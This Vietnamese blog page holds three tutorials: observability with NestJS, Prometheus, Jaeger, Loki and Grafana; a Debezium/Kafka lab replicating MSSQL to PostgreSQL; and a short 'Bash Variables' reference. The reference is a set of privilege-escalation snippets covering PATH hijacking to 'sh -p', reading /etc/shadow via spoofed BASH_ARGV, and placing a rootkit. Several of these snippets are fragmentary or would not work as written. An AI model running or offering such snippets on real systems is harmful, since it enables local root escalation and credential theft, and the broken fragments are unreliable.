Metrics, Tracing, Logging qua ví dụ cụ thể giúp ích bạn được những gì

 Hôm nay rãnh rỗi ngồi chém gió về Metrics, Tracing, Logging qua ví dụ cụ thể, qua đây sẽ giúp hình dung ra nó là cái gì, điều này sẽ giúp ích cho bạn khá nhiều.


Nói về ba phương thức này thực sự nó rất là nhiều, xem như nó là một keyword để bạn tìm hiểu sau, mục đích của bài viết này giúp bạn có cái nhìn khái quát hơn, hình dung ra một bức tranh khái quát và tổng thể hơn.

Metrics

Như câu chuyện xóm tôi mùa UEFA Euro 2024, bọn trộm chó và trộm gà đá có một chiếc xe Exciter dùng đi ăn trộm. Bọn trộm muốn biết chiếc xe tụi nó chạy ok không, nó sẽ theo dõi các chỉ số như: 

Tốc độ xe khi chạy bao nhiêu, sau một cuốc thì tốn bao nhiêu xăng, khi bị người dân rượt đuổi thì chạy nhanh động cơ, nhông sên đĩa sẽ co giãn nhiều không, máy như thế nào... 

Tương tự trong phần mềm cũng vậy, Metrics giúp theo dõi số lượng request lớn hay nhỏ, CPU xử lý nhanh hay chậm, thời gian phản hồi bao lâu, hệ thống sẽ sữ lý như thế nào... 

Đó là nhiệm vụ cơ bản của Metrics, giúp bạn theo dõi các metrics để phát hiện một Metrics nào đó bất thường, bạn có thể biết rằng có ổn không và cần phải kiểm tra hay không. Thông qua đó bạn có thể xác định được nguyên nhân và đưa ra chách khắc phục. 

Thông thường theo dõi metrics theo thời gian, bạn có thể xác định các điểm tắt nghẽn và tối ưu hóa hệ thống để hoạt động hiệu quả hơn. Dữ liệu metrics giúp bạn dự đoán nhu cầu trong tương lai và lên kế hoạch nâng cấp hệ thống phù hợp.


Metrics, Tracing, Logging qua ví dụ cụ thể giúp ích bạn được những gì


Tracing :

Như ví dụ trên, ngôi nhà của bạn bao gồm hàng rào xung quanh bao bọc kỹ càng lưới B40 ... như một hệ thống của bạn. Xung quanh nhà bạn setup các chuồng gà đá, chuồng chó, khu vực chó đi tới đi lui, những khu vực này xem như một service trong một hệ thống.

Bọn trộm chó, trộm gà khi nhảy vào hàng rào nha bạn trước tiên bọn nó sẽ đi tìm từng ngõ ngách xung quanh nhà để đi tìm chuồng nào nhốt gà, chuồng nào nhốt chó ... Khi nó đi tới nơi nào giống như người dùng tiếp cận một service, tracing cũng giống như bạn gắn camera để  giám sát biết rằng thằng trộm nó đi tới chuồng gà lúc mấy giờ, tới chuồng chó lúc mấy giờ, lúc nó đi, nó bắt con gà, con chó nào ...

Thông qua đây bạn sẽ biết được thời gian, hành vi nó như thế nào, lục lọi tìm những gì ... Thông qua tracing ta có thể phân tích được hành vì như thằng này nó thích tập trung bắt nhiều gà trước hay bắt chó trước... Tương tự như phần mềm ta sẽ biết được service nào dùng nhiều nhất, service nào xử lý lâu nhất hoặc cái nào có vấn đề... Tóm lại Tracing sẽ giúp bạn theo dõi toàn bộ hành trình của request yêu cầu về hệ thống, từ dich vụ này đến dịch vụ khác trên hệ thống và ghi lại chi tiết điều đó.

Logging :

Có nhiệm vụ lưu lại các sự kiện xảy ra trong hệ thống của bạn, giống như bọ trộm gà trộm chó đến chuồng gà , chuôngg chó là một sự kiện, cạy khoá chuồng gà, chuồng chó là một sự kiện nó sẽ lưu lại thông tin cụ thể. Mọi thứ được ghi lại cụ thể theo từng tiến trình, quá trình thao tác nhằm mục đích xác định các hành vi, thao tác đã xảy ra...

Logging là quá trình ghi lại các sự kiện xảy ra trong hệ thống phần mềm để hỗ trợ giám sát, phân tích, và khắc phục sự cố. Thông qua bon trộm gà trômh chó  chúng ta có thể thấy cách logging giúp theo dõi các cách thức hoạt động và cung cấp dữ liệu cần thiết để duy trì và cải thiện hệ thống

OK, bạn cứ hiểu nôm na như vậy, hôm nay sẽ dùng những thứ sau để thực hiện bài này :

Code: Tôi sẽ dùng nestjs để tạo ra api mẫu để client gởi request

Metrics: Sẽ dùng Prometheus Server và thư viện @willsoto/nestjs-prometheus cho nestjs

Tracing: Sẽ dùng thư viện OpenTelemetry và Jaeger xem thông tin ở local

Logging: Sẽ dùng Loki server để lưu logs, và loki có api hỗ trợ post metho, quá đây sẽ post logs đẩy lên Loki.

Monitoring : Tổng hợp mọi thứ lại để xem trực quan trên Grafana, thông qua Grafana sẽ chia sẽ mọi người sử dụng tổng hợp mọi thứ ở trên để trực quan hơn.


Phần code : 

Tối có tạo project nestjs đơn giản sau, gọi phương thức Get với 2 api /tromcho và /tromga


Metrics, Tracing, Logging qua ví dụ cụ thể giúp ích bạn được những gì

Trong code tôi sử dụng libs opentelemetry(Otel) để tracing và exporter thông tin đến jaeger


"@opentelemetry/exporter-jaeger": "^1.25.0",
"@opentelemetry/instrumentation-express": "^0.40.1",
"@opentelemetry/instrumentation-http": "^0.52.0",
"@opentelemetry/instrumentation-nestjs-core": "^0.38.0",
"@opentelemetry/resources": "^1.25.0",
"@opentelemetry/sdk-node": "^0.52.0",
"@opentelemetry/sdk-trace-base": "^1.25.0",
"@opentelemetry/semantic-conventions": "^1.25.0",


import { SimpleSpanProcessor } from "@opentelemetry/sdk-trace-base";
import { NodeSDK } from "@opentelemetry/sdk-node";
import * as process from "process";
import { HttpInstrumentation } from "@opentelemetry/instrumentation-http";
import { ExpressInstrumentation } from "@opentelemetry/instrumentation-express";
import { NestInstrumentation } from "@opentelemetry/instrumentation-nestjs-core";
import { Resource } from "@opentelemetry/resources";
import { SemanticResourceAttributes } from "@opentelemetry/semantic-conventions";
import { JaegerExporter } from "@opentelemetry/exporter-jaeger";
require("dotenv").config();

const jaegerExporter = new JaegerExporter({
  endpoint: `http://${process.env.JAEGER_EXPORT_URL}/api/traces`,
});

const traceExporter = jaegerExporter;

export const otelSDK = new NodeSDK({
  resource: new Resource({
    [SemanticResourceAttributes.SERVICE_NAME]: `nestjs-otel`,
  }),
  spanProcessor: new SimpleSpanProcessor(traceExporter),
  instrumentations: [
    new HttpInstrumentation(),
    new ExpressInstrumentation(),
    new NestInstrumentation(),
  ],
});

process.on("SIGTERM", () => {
  otelSDK
    .shutdown()
    .then(
      () => console.log("SDK shut down successfully"),
      (err) => console.log("Error shutting down SDK", err)
    )
    .finally(() => process.exit(0));
});

Metrics, Tracing, Logging qua ví dụ cụ thể giúp ích bạn được những gì



Sử dụng libs nestjs-prometheus để tạo metrics theo dõi server app để đẩy lên Prometheus

"@willsoto/nestjs-prometheus": "^6.0.1",


import { Controller, Get, Res } from "@nestjs/common";
import { PrometheusController } from "@willsoto/nestjs-prometheus";

@Controller("metrics")
export class PromController extends PrometheusController {
  @Get()
  metrics(@Res({ passthrough: true }) response: Response) {
    return super.index(response);
  }
}


Metrics, Tracing, Logging qua ví dụ cụ thể giúp ích bạn được những gì


Metrics, Tracing, Logging qua ví dụ cụ thể giúp ích bạn được những gì



Trên Loki có một api cho sử dụng post method và sử dụng axios để đẩy logs lên Loki, ở đây sẽ bắt 2 sự kiện, thông tin của controller, có nghĩa mọi thông tin của controller sẽ bắt logs khi gọi controller và đẩy nó vào Loki.

Cái thứ 2 sẽ custom logs, dùng nó định nghĩa cho một logs nào đó cần dùng, thường như service bắt lỗi hay gì đó cần dùng lưu logs sẽ dùng nó.

import axios from "axios";
import {
  Injectable,
  NestInterceptor,
  ExecutionContext,
  CallHandler,
  Logger,
} from "@nestjs/common";
import { Observable } from "rxjs";
import { tap } from "rxjs/operators";
import { v4 as uuidv4 } from "uuid";
require("dotenv").config();
@Injectable()
export class LoggingInterceptor implements NestInterceptor {
  private readonly logger = new Logger(LoggingInterceptor.name);
  httpService: any;

  intercept(context: ExecutionContext, next: CallHandler): Observable<any> {
    if (context.getType() === "http") {
      return this.logHttpCall(context, next);
    }
  }

  private logHttpCall(context: ExecutionContext, next: CallHandler) {
    const request = context.switchToHttp().getRequest();
    const userAgent = request.get("user-agent") || "";
    const { ip, method, url, body, query, params } = request;
    const correlationKey = uuidv4();
    const userId = request.user?.id || 'anonymous';
    const className = context.getClass().name;
    const handlerName = context.getHandler().name;

    this.logger.log(
      `[${correlationKey}] ${userAgent} ${ip} ${method} ${url} ${JSON.stringify(body)} ${JSON.stringify(query)} ${JSON.stringify(params)} ${userId}`
    );
    const now = Date.now();
    return next.handle().pipe(
      tap(async () => {
        const response = context.switchToHttp().getResponse();
        const { statusCode } = response;

        const logData = `[${correlationKey}] ${userAgent} ${ip} ${method} ${url} ${JSON.stringify(body,)} ${JSON.stringify(query)} ${JSON.stringify(params)} ${userId}  ${Date.now() - now}ms`

        await this.pushToLoki(logData,className,handlerName);
      })
    );
  }

  private async pushToLoki(logData: any,contextStream: any, traceStream: any) {
    try {
      const lokiData = {
        streams: [
          {
            stream: {
              env: "nestjs",
              context: contextStream,
              trace: traceStream,
            },
            values: [[(Date.now() * 1e6).toString(), logData]],
          },
        ],
      };

      await axios.post(`http://${process.env.LOKI_SERVER_URL}/loki/api/v1/push`, lokiData);
      this.logger.log("Log sent to Loki server successfully.");
    } catch (error) {
      this.logger.error("Error sending log to Loki server:", error);
    }
  }
}

import { Injectable, Logger } from "@nestjs/common";
import axios from "axios";
require("dotenv").config();
@Injectable()
export class LokiLogger {
  constructor(private readonly logger: Logger) {}

  error(message: any, trace?: string, context?: string) {
    this.sendToLoki("error", message, trace, context);
  }

  warn(message: any, context?: string) {
    this.sendToLoki("warn", message, undefined, context);
  }

  log(message: any, context?: string) {
    this.sendToLoki("info", message, undefined, context);
  }

  private async sendToLoki(
    level: string,
    message: any,
    trace?: string,
    context?: string
  ) {
    try {
      const lokiData = {
        streams: [
          {
            stream: {
              env: "nestjs",
              level: level,
              context: context,
              trace: trace,
            },
            values: [[(Date.now() * 1e6).toString(), message]],
          },
        ],
      };

      await axios.post(`http://${process.env.LOKI_SERVER_URL}/loki/api/v1/push`, lokiData);
      this.logger.log(`[${level}] Log sent to Loki server successfully.`);
    } catch (error) {
      this.logger.error("Error sending log to Loki server:", error);
    }
  }
}

Tất cả ở trên từ Jarger đến prometheus mục đích test local để xem logic đúng không, giờ cần phải đẩy lên Grafana để quản lý tập trung, vì nó bao gồm cả user/pass đăng nhập nên việc này sẽ thuận tiện hơn.

Data sources: Chọn đúng loại data sources cần dùng, như bài này sẽ dùng như sau, cứ add và cung cấp đúng thông tin sẽ nhận


Metrics, Tracing, Logging qua ví dụ cụ thể giúp ích bạn được những gì

Dashboards:  Hiện tại sử dụng Dashboards ID : 11159 có tên NodeJS Application Dashboard thấy cũng khá ok.

Metrics, Tracing, Logging qua ví dụ cụ thể giúp ích bạn được những gì


Sau khi đã tích hợp Logging và Tracing thì Explore sẽ như sau


Metrics, Tracing, Logging qua ví dụ cụ thể giúp ích bạn được những gì

Và Tracing nó sẽ như sau

Metrics, Tracing, Logging qua ví dụ cụ thể giúp ích bạn được những gì

Đây là link project demo, có tham khảo link sau:


https://github.com/tieukhachngao/Metrics-Tracing-Logging


Nhãn:

Reference - Debezium và Kafka sử dụng Source connector và Sink connector để stream data (ví dụ MSSQL sang PostgreSQL)

 Hôm nay rãnh rỗi sẽ viết một bài liên quan đến Debezium và Kafka, mục đích của bài này là sử dụng Source connector và Sink connector để đẩy dữ liều từ MSSQL sang PostgreSQL theo thời gian thực.

Trước tiên thực hiện bài này nên đọc qua trước Debezium và Kafka gì, mục đích của nó là gì tại đây:

Reference - Debezium và Kafka sử dụng Source connector và Sink connector để stream data (ví dụ MSSQL sang PostgreSQL)
https://debezium.io/
Reference - Debezium và Kafka sử dụng Source connector và Sink connector để stream data (ví dụ MSSQL sang PostgreSQL)


https://debezium.io/


Còn đối với tôi thì đơn giản là Debezium là công cụ dùng để lắng nghe các thay đổi dữ liệu từ các cơ sở dữ liệu như thêm xoá sửa ... (Change Data Capture (CDC))

Kafka là một nền tảng phân tán dùng để xử lý các luồng dữ liệu theo thời gian thực.

Ở bài viết này tôi sẽ cài đặt và cấu hình trên VM, tôi sẽ dùng openSUSE Leap 15, tại vì sao tôi lại cài trên này ? Đơn giản khi bạn chịu khó làm thủ công đến khi bạn hiểu rõ bản chất của nó sau này sẽ hỗ trợ bạn khá là nhiều.

Bài lab này sẽ có 3 server sau :

openSUSE Leap Debezium và Kafka : 192.168.1.6 - Dùng để cài Leap Debezium và Kafka

MSSQL: 192.168.1.3 - Chứa data chính

PostgreSQL : 192.168.1.5 - Chứa data lấy từ data MSSQL


Tôi có kịch bản như sau : Bên phần server MSSQL nó phục vụ cho một công việc nào đó ABC trong đó có một table tên là dbo.Aircraft nó phục vụ cho một công việc nào đó, giờ câu hỏi đặt ra là có một bên dùng PostgreSQL muốn có bảng public.Aircraft với nội dụng giống vậy và nó được cập nhật theo thời gian thực, có nghĩa là bên MSSQL làm gì thay đổi gì ở table này thì bên PostgreSQL cũng thay đổi theo và nó phải chạy theo thời gian thực. 

Mô hình như sau :

MSSQL ==connector===> Debezium và Kafka ===Sink==> PostgreSQL


Cài đặt Debezium và Kafka:

Java Openjdk : Debezium và Kafka chạy trên nền java nên đầu tiên cần phải cài java jdk trước    

sudo zypper install java-11-openjdk


Kafka : 

Hãy theo dõi link bên dưới để tim kiếm phiên bản muốn cài.

https://archive.apache.org/dist/kafka/

Hiện tại kafka_2.12-3.7.0 là mới nhất nên sẽ download bản này về cài, mới nhất ở hiện tại, sau khi kéo về xong , giải nén ra và cho vào /usr/local/kafka nơi này sẽ là nơi chúng ta làm việc chính.

Reference - Debezium và Kafka sử dụng Source connector và Sink connector để stream data (ví dụ MSSQL sang PostgreSQL)


wget https://archive.apache.org/dist/kafka/3.7.0/kafka_2.12-3.7.0.tgz
tar -xzf kafka_2.12-3.7.0.tgz
mv kafka_2.12-3.7.0 /usr/local/kafka


Zookeeper :

Sau khi tải các gói về đầy đủ thì bên trong Kafka bao gồm luôn cả ZookeeperKafka sử dụng Zookeeper để quản lý thông tin về các brokers, topics và Partition. Zookeeper giúp duy trì tính nhất quán và đồng bộ giữa các brokers trong cụm nên sau khi đã tải về nên cần chạy đúng các quy trình sau.

Đầu tiên để lên được kafka cần chạy Zookeeper trước, sau khi nó chạy hoàn tất sẽ tiến hành chạy Kafka, chỉ cần 2 bước này thì đã hoàn tất quá trình để  có được server Kafka.

Chạy Zookeeper trước : 

cd /usr/local/kafka
bin/zookeeper-server-start.sh config/zookeeper.properties

Reference - Debezium và Kafka sử dụng Source connector và Sink connector để stream data (ví dụ MSSQL sang PostgreSQL)



Chỉnh sửa vài thông tin cho Kafka, ở đây tôi muốn dùng bằng IP nên sẽ chỉnh sửa một số thứ như sau :
Thói quen của tôi hay chỉ định IP cho server cụ thể nên sẽ fix cứng nó là IP. Và port mặc định nó sẽ chạy 9092.
cd /usr/local/kafka
vi config/server.properties
listeners=PLAINTEXT://192.168.1.6:9092

Sau khi chỉnh sửa xong bắt đầu chạy Kafka

cd /usr/local/kafka
bin/kafka-server-start.sh config/server.properties


Reference - Debezium và Kafka sử dụng Source connector và Sink connector để stream data (ví dụ MSSQL sang PostgreSQL)


Debezium : 

Đây là phần quan trọng và khá là thú vị, trong Debezium nó có hỗ trợ nhiều phần, ở đây tôi dùng Kafka nên cần sử dụng phần Debezium Connectors.

Nói về Debezium Connectors  thì bạn cần hiểu nó dùng để theo dõi database  thông qua change data capture (CDC), nhiệm vụ chính của nó là như vậy.

Một lưu ý có hai lựa chọn như sau :

Connect Standalone : Một là nếu bạn muốn chạy connect-standalone.properties thì sẽ không cần bận tâm gì nhiều, chỉ cần tải các plugin sau về và copy nó vào Kafka lib, lưu ý là connect-standalone nhé. Khi bạn tải về copy bỏ vào là xem như bạn đã giải quyết xong phần này và chạy lệnh sau là đã hoàn thành.

Làm như thế nào là chạy một lần không sử dụng được plugin.path , plugin.path là gì ? ý tôi muốn phân ra từng cụm các plugins để dễ quản lý, muốn dùng plugin nào tách biệt ra để dễ quản lý. 

Phần connect-standalone này thì tôi không giải quyết được, chỉ copy mọi thứ vào Kafka libs để chạy nên không dùng được plugin.path,  khi cấu hình plugin.path mọi thứ ok nhưng chỉ phần connect ok còn sink thì vẫn bị 500.


wget https://d2p6pa21dvn84.cloudfront.net/api/plugins/confluentinc/kafka-connect-jdbc/versions/10.7.6/confluentinc-kafka-connect-jdbc-10.7.6.zip
unzip confluentinc-kafka-connect-jdbc-10.7.6.zip
cp -r confluentinc-kafka-connect-jdbc-10.7.6/* /usr/local/kafka/libs

wget https://repo1.maven.org/maven2/io/debezium/debezium-connector-sqlserver/2.6.2.Final/debezium-connector-sqlserver-2.6.2.Final-plugin.tar.gz
tar -zxf debezium-connector-sqlserver-2.6.2.Final-plugin.tar.gz
cp -r debezium-connector-sqlserver/* /usr/local/kafka/libs

wget https://repo1.maven.org/maven2/io/debezium/debezium-connector-postgres/2.6.2.Final/debezium-connector-postgres-2.6.2.Final-plugin.tar.gz
tar -zxf debezium-connector-postgres-2.6.2.Final-plugin.tar.gz
cp -r debezium-connector-postgres/* /usr/local/kafka/libs


Ở trên là đang copy 3 plugins mssql, postgress connector và jdbc connector bao gồm sink vào libs kafka, đơn giản là vậy thôi.


cd /usr/local/kafka
vi config/connect-standalone.properties
edit : bootstrap.servers=192.168.1.6:9092

bin/connect-standalone.sh config/connect-standalone.properties
Reference - Debezium và Kafka sử dụng Source connector và Sink connector để stream data (ví dụ MSSQL sang PostgreSQL)


Reference - Debezium và Kafka sử dụng Source connector và Sink connector để stream data (ví dụ MSSQL sang PostgreSQL)


Connect Distributed : 

Để giải quyết vấn đề quản lý được các plugins và sử dụng plugin.path tôi cần dùng connect-distributed, nó có nghĩa là nếu tôi muốn dùng connector nào thì tôi bỏ nó vào một folder, sau này cần nâng cấp phiên bản hay gì tôi chỉ vào đó giải quyết, vì file khá là nhiều nếu ném tất cả vào kafka libs thì đối với bản thân tôi thấy khá là kì kì, tôi không muốn tiếp cận vấn đề như vậy.

Giải quyết việc này khá đơn giản như sau:

Đầu tiền trong dự án Kafka tôi sẽ tạo một folder connector, tôi sẽ kéo các plugin cần thiết vào đó ví dụ như debezium-connector-postgres để kết nối postgress,  hoặc debezium-connector-sqlserver để kết nối mssql hoặc confluentinc-kafka-connect-jdbc-10.7.6 để sink data tới postgress ...  vân vân.

Ở bài nào này chỉ cần confluentinc-kafka-connect-jdbc với debezium-connector-sqlserver là đủ nhưng tôi sẽ thêm debezium-connector-postgres để nó có tính tường minh dễ hiểu hơn.

cd /usr/local/kafka
vi config/connect-distributed.properties
edit bootstrap.servers=192.168.1.6:9092 Add: plugin.path=/usr/local/kafka/plugins,

Trong connect-distributed.properties chỉ cần chỉnh sửa lại thông tin và thêm dòng plugin.path như trên, vào việc thứ 2 là tôi muốn các plugin theo sự quản lý của tôi, mọi thứ phân ra rõ ràng để vào thư mục connector trong dự án.

Lưu ý phần này libs là mặc định củ của kafka libs và không thêm bất cứ cái gì, ở đây xem như bước đầu tiên và hay bỏ qua cách làm trên của connect-standalone.

wget https://d2p6pa21dvn84.cloudfront.net/api/plugins/confluentinc/kafka-connect-jdbc/versions/10.7.6/confluentinc-kafka-connect-jdbc-10.7.6.zip
unzip confluentinc-kafka-connect-jdbc-10.7.6.zip
cp -r confluentinc-kafka-connect-jdbc-10.7.6/lib/* /usr/local/kafka/connector/confluentinc-kafka-connect-jdbc
wget https://repo1.maven.org/maven2/io/debezium/debezium-connector-sqlserver/2.6.2.Final/debezium-connector-sqlserver-2.6.2.Final-plugin.tar.gz tar -zxf debezium-connector-sqlserver-2.6.2.Final-plugin.tar.gz cp -r debezium-connector-sqlserver/* /usr/local/kafka/connector/debezium-connector-sqlserver
wget https://repo1.maven.org/maven2/io/debezium/debezium-connector-postgres/2.6.2.Final/debezium-connector-postgres-2.6.2.Final-plugin.tar.gz tar -zxf debezium-connector-postgres-2.6.2.Final-plugin.tar.gz cp -r debezium-connector-postgres/* /usr/local/kafka/connector/debezium-connector-postgres

Sau khi mọi thứ đã copy tách biệt ra rồi, cái quan trọng là sử dụng Symbolic link để link plugin với các thư mục trên.

ln -s /usr/local/kafka/connector/confluentinc-kafka-connect-jdbc /usr/local/kafka/plugins/
ln -s /usr/local/kafka/connector/debezium-connector-sqlserver//usr/local/kafka/plugins/
ln -s /usr/local/kafka/connector/debezium-connector-postgres/ /usr/local/kafka/plugins/

Vậy là xong và chậy lệnh sau là hoàn thành

cd /usr/local/kafka
bin/connect-distributed.sh config/connect-distributed.properties

Reference - Debezium và Kafka sử dụng Source connector và Sink connector để stream data (ví dụ MSSQL sang PostgreSQL)

Reference - Debezium và Kafka sử dụng Source connector và Sink connector để stream data (ví dụ MSSQL sang PostgreSQL)

Đối với cách này nó sẽ tạo cho bạn connect-cluster, khi nào đăng ký connect thì có thể vào web như trên để kiểm tra, có nghĩa là chưa đăng ký nó sẽ rỗng.

Sau khi mọi thứ tôi chắc chắn đã chạy ngon lành rồi thì sẽ cần config service để sau này có thể chạy nó lên không cần phải mở terminal để chạy từng cái một nưa.

Service Zookeeper:

sudo vi /etc/systemd/system/zookeeper.service

[Unit]
Description= Zookeeper
After=network.target

[Service]
User=sa
Group=users
ExecStart=/usr/local/kafka/bin/zookeeper-server-start.sh /usr/local/kafka/config/zookeeper.properties
LimitNOFILE=10240
Restart=on-failure
RestartSec=5s

[Install]
WantedBy=multi-user.target


sudo systemctl enable zookeeper.service
sudo systemclt start zookeeper.service

Service Kafka:

sudo vi /etc/systemd/system/kafka.service

[Unit]
Description= Kafka
After=network.target

[Service]
User=sa
Group=users
ExecStart=/usr/local/kafka/bin/kafka-server-start.sh /usr/local/kafka/config/server.properties
LimitNOFILE=10240
Restart=on-failure
RestartSec=5s

[Install]
WantedBy=multi-user.target


sudo systemclt enable kafka.service
sudo systemclt start kafka.service

Service Debezium Kafka Standalone : (Lưu ý chỉ chọn 1 trong 2 giữa Standalone và Distributed, 2 cái này sẽ chung một port 8083)

sudo vi /etc/systemd/system/debezium-standalone-kafka.service

[Unit]
Description= Debezium Standalone Kafka
After=network.target

[Service]
User=sa
Group=users
ExecStart=/usr/local/kafka/bin/connect-standalone.sh /usr/local/kafka/config/connect-standalone.properties
LimitNOFILE=10240
Restart=on-failure
RestartSec=5s

[Install]
WantedBy=multi-user.target


sudo systemctl enable debezium-standalone-kafka.service
sudo systemclt start debezium-standalone-kafka.service

Service Debezium Kafka Distributed :

sudo vi /etc/systemd/system/debezium-distributed-kafka.service

[Unit]
Description= Debezium Kafka
After=network.target

[Service]
User=sa
Group=users
ExecStart=/usr/local/kafka/bin/connect-distributed.sh /usr/local/kafka/config/connect-distributed.properties
LimitNOFILE=10240
Restart=on-failure
RestartSec=5s

[Install]
WantedBy=multi-user.target


sudo systemctl enable debezium-connect-distributed-kafka.service
sudo systemclt start debezium-connect-distributed-kafka.service

Như vậy là đã hoàn thành xong phần cài đặt và cấu hình Debezium và Kafka , tuy nó dài vậy nhưng khi thao tác nếu yêu cầu mạng download nhanh thì chưa tới 5p đã xong.


Microsoft SQL Server : 

Đây là phần data source, nơi để nhận data đưa nó vào Kafka, phần này thì câu hỏi bạn đặt ra đầu tiên sẽ như sau:

Hey, mày đang dùng MSSQL phiên bản nào vậy, nếu Microsoft SQL Server Express thì nghỉ chơi nhé, tao không làm bài này được đâu. Nếu cài bản cao hơn thì, Hey, mày có enable SQL Server Agent lên chưa, nếu chưa hãy enable nó lên nhé.

Tiếp theo bạn cần phải hiểu change data capture (CDC) là gì nếu bạn đang nắm phần MSSQL, nó đơn giản khái quát như sau : 
Dùng để thu thập dữ liệu thay đổi sử dụng SQL Server Agent để ghi nhật ký  thêm, xoá, sửa trong table, để làm chi, nó giúp bạn xác định data của bạn có thay đổi không, nếu nó thay đổi thì sẽ kích hoạt cập nhật lại data mới nhất từ MSSQL sang PostgreSQL.

Các lệnh cơ bản sau để giúp bạn bật tắt CDC:
Enable CDC:
EXEC sys.sp_cdc_enable_db;
Disable CDC
EXEC sys.sp_cdc_disable_db;
Giờ tôi có database tên : OPERATION và table là Aircraft tôi sẽ tiến hành như sau:

  EXEC sys.sp_cdc_enable_db;

  EXEC sys.sp_cdc_enable_table 
   @source_schema = N'dbo', 
   @source_name = N'Aircraft', 
   @supports_net_changes = 0;
   @role_name = NULL;
Cái chú ý ở đây là @supports_net_changes , tuỳ vào mục đích và hệ thống hiện tại của bạn chọn sao cho phù hợp.

1: Hiểu nôm na như là một bảng tóm tắt thông tin, chỉ cập nhật thông tin thực tế của dữ liệu, ví dụ bạn làm gì làm nó sẽ hiển thị kết quả thực và trong các phạm vi được chỉ định.
0: Nó sẽ ghi lại tất cả các thông tin bạn thêm , xoá sửa, chi tiết từng cái một, tuỳ vào mục đích của bạn cần dùng là gì, ở đây tôi sẽ để là 0, nếu thêm xoá sửa gì thì sẽ cập nhật hết.

Sau khi chạy lệnh trên sẽ có kết quả giống bên dưới, đối với CDC kết hợp với kafka này, khi đăng ký trên kafka lần đầu tiên khi nhận topics nó sẽ nhận hết trong các table, nó sẽ chụp lại 1 bản sao, còn theo dõi thì chỉ phụ thuộc vào cdc bật trên bảng nào.

Reference - Debezium và Kafka sử dụng Source connector và Sink connector để stream data (ví dụ MSSQL sang PostgreSQL)

PostgreSQL Server: Cái này đơn giản là cung cấp cho một user và password có đủ quyền đọc, ghi, tạo table..., còn lại sẽ tự giải quyết cho bạn.

Quay lại phần Kafka, đăng ký connector như sau: 

Hiện tại đang dùng connect-distributed , đối với standalone cũng vậy chỉ cần cú pháp sau.

Tạo file đăng ký connector MSSQL

{
    "name": "inventory-connector",
    "config": {
        "connector.class" : "io.debezium.connector.sqlserver.SqlServerConnector",
        "tasks.max" : "1",
        "topic.prefix" : "sqlserver",
        "database.hostname" : "192.168.1.3",
        "database.port" : "1433",
        "database.user" : "sa",
        "database.password" : "dev@@123",
        "database.names" : "OPERATION",
        "schema.history.internal.kafka.bootstrap.servers" : "192.168.1.6:9092",
        "schema.history.internal.kafka.topic": "schema-changes.inventory",
        "database.encrypt": "false"
    }
}

Sau khi tạo file chạy đăng ký

curl -i -X POST -H "Accept:application/json" -H  "Content-Type:application/json" http://192.168.1.6:8083/connectors/ -d @sql.json

Reference - Debezium và Kafka sử dụng Source connector và Sink connector để stream data (ví dụ MSSQL sang PostgreSQL)

Reference - Debezium và Kafka sử dụng Source connector và Sink connector để stream data (ví dụ MSSQL sang PostgreSQL)


Như vậy đã có các topics tạo ra, như đã nói ở trên nó đã tạo ra các topics như vậy và khi nào có CDC bạn mới theo dõi real time được. Tương tự với postgres cũng tương tự như trên làm tương tự nha trên.

Tạo file đăng ký connector PostgreSQL:


{
    "name": "jdbc-sink",
    "config": {
        "connector.class": "io.confluent.connect.jdbc.JdbcSinkConnector",
        "tasks.max": "1",
        "topics": "sqlserver.OPERATION.dbo.Aircraft",
        "connection.url": "jdbc:postgresql://192.168.1.5:5432/OPERATION",
        "connection.user": "root",
        "connection.password": "root",
        "transforms": "unwrap",
        "transforms.unwrap.type": "io.debezium.transforms.ExtractNewRecordState",
        "transforms.unwrap.drop.tombstones": "false",
        "auto.create": "true",
        "insert.mode": "upsert",
        "delete.enabled": "true",
        "pk.fields": "RegistrationID",
        "pk.mode": "record_key",
        "table.name.format": "Aircraft"
    }
}

Sau khi chạy xong nó sẽ tự hộ trợ tạo table và kiểu dữ liệu luôn cho bạn, để đảm bảo kiểu dữ liệu từ MSSQL sang PostgreSQL sẽ phù hợp.

curl -i -X POST -H "Accept:application/json" -H  "Content-Type:application/json" http://192.168.1.6:8083/connectors/ -d @pos.json

Reference - Debezium và Kafka sử dụng Source connector và Sink connector để stream data (ví dụ MSSQL sang PostgreSQL)


Reference - Debezium và Kafka sử dụng Source connector và Sink connector để stream data (ví dụ MSSQL sang PostgreSQL)



Thành quả sẽ như sau, nếu bạn có thay đổi bất cứ gì từ MSSQL thì bên PostgreSQL cũng sẽ thay đổi theo, quá trình này sẽ real time.



Reference - Debezium và Kafka sử dụng Source connector và Sink connector để stream data (ví dụ MSSQL sang PostgreSQL)


Reference - Debezium và Kafka sử dụng Source connector và Sink connector để stream data (ví dụ MSSQL sang PostgreSQL)



Nhãn: ,

Reference - Bash Variables

 Bash Variables

_ $_, an underscore

echo $_
echo "echo 'Intercepted!'" > _
chmod +x _
$_ ls

BASH

echo "/bin/sh -p" > /tmp/bash
export PATH=/tmp:$PATH
echo "Running as $BASH"

BASHOPTS

echo $BASHOPTS
BASHOPTS=restricted_shell /bin/bash
echo $BASHOPTS

BASHPID

#!/bin/bash
echo "Current user: $(whoami)"
echo "Current process ID: $$"
echo "BASHPID: $BASHPID"
if [ $BASHPID -eq $$ ]; then
    echo "Hello world" >> /etc/system_file
else
    echo "exit"
    exit 1
fi

BASH_ALIASES

export BASH_ALIASES='alias ll="ls -al"'
source ~/.bashrc
ll

BASH_ARGC

if [ $BASH_ARGC -eq 1 ]; then
  # make backup
fi

BASH_ARGC=1
/usr/local/bin/backup.sh
BASH_ARGV
FILE=${BASH_ARGV[1]}
cp /backup/$FILE /home/user/

BASH_ARGV[0]="restore.sh"
BASH_ARGV[1]="/etc/shadow"
/usr/local/bin/restore.sh
BASH_ARGV0
if [ "$BASH_ARGV0" == "/etc/init.d/xxxx" ]; then
   # restart services
fi

BASH_ARGV0="/etc/init.d/xxxx" 
/usr/local/bin/restart.sh
BASH_CMDS
if [[ "${BASH_CMDS[0]}" == "sudo" ]]; then
  # make backup
fi

BASH_CMDS[0]="sudo"
/usr/local/bin/logbackup.sh
BASH_COMMAND
if [ "$BASH_COMMAND" = "systemctl restart server" ]; then 
   # restart server
fi

export BASH_COMMAND='systemctl restart server'
/usr/local/bin/restart-server.sh
BASH_COMPAT
[ -n "$BASH_VERSINFO" ] || {
  # legacy Bash command
}

unset BASH_VERSINFO
export BASH_COMPAT=3.2
/path/to/suid-script
BASH_ENV
/bin/bash -p 
mv /tmp/rootkit /usr/local/sbin
export BASH_ENV=/home/user/.bashrc
BASH_EXECUTION_STRING
